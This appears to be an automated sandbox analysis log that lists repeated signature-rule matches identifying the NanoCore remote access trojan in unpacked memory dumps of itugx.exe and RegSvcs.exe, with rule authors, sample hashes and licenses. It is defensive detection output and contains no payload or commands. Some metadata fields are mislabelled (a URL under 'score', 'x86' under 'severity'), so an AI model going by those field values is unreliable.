Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
